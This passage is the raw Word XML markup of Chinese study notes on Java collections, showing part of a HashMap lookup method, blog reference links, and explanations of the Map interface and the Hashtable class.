          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.hash == hash &amp;&amp; ((k = e.key) == key || key.equals(k)))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e.value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2346B" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="004B6114">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="9CBA39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="图片 9" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="190500" cy="190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF6" w:rsidRPr="00F41A4C" w:rsidRDefault="00DA54D7" w:rsidP="00BF703E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="0023328B" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/vking_wang/article/details/14166593</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0023328B" w:rsidRPr="00F41A4C" w:rsidRDefault="0023328B" w:rsidP="00BF703E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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http://www.cnblogs.com/lzrabbit/p/3721067.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00F41A4C" w:rsidRDefault="00B4146A" w:rsidP="00AF2F1F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="0087643F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="00744ED7" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  HashMap</w:t>
      </w:r>
      <w:r w:rsidR="00744ED7" w:rsidRPr="00F41A4C">
        <w:t>源码分析</w:t>
      </w:r>
      <w:r w:rsidR="00720562">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>没有继承</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>接口，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的映射。一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>中不能包含相同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>只能映射一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>接口提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>种集合的视图，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的内容可以被当作一组</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>集合，一组</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>集合，或者一组</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key-value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>映射。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>继承</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>接口，实现一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key-value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>映射的哈希表。任何非空（</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>non-null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）的对象都可作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
